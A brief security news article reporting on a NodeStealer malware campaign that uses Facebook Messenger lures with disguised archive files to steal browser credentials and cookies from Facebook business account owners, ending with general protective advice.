An ongoing campaign is targeting Facebook business accounts with malicious messages with the aim of stealing victims’ credentials and potentially taking over their accounts. The attackers primarily target victims in southern Europe and North America, particularly in the service and technology sectors.
The NodeStealer malware, first discovered by Meta in May 2023, is a JavaScript-based malware that steals cookies and passwords from web browsers, compromising accounts on platforms such as Facebook, Gmail and Outlook.
Recently, Netskope Threat Labs revealed that Vietnamese threat actors are behind the attacks, using similar tactics to other adversaries in the same region. These attackers use deceptive messages sent via Facebook Messenger to distribute credential-stealing malware in ZIP or RAR archive files. The malware payload file is disguised as an image of a defective product and prompts Facebook business page owners to download it.
Once executed, the archive files open the Chrome web browser and redirect the victim to a harmless webpage. In the background, a PowerShell command downloads additional payloads, including the Python interpreter and the NodeStealer malware. The NodeStealer variant used in this campaign is more advanced than previous versions. It uses batch files to download and run Python scripts and steals credentials and cookies from multiple browsers and websites.
Stolen credentials and cookies can be used by attackers to take control of Facebook accounts and conduct fraudulent transactions through legitimate business pages. This campaign could be the start of a more targeted attack in the future.
It is crucial that Facebook Business account holders exercise caution and avoid downloading suspicious files or clicking on unknown links. Regularly updating security measures and implementing multi-factor authentication can also help protect against such attacks.
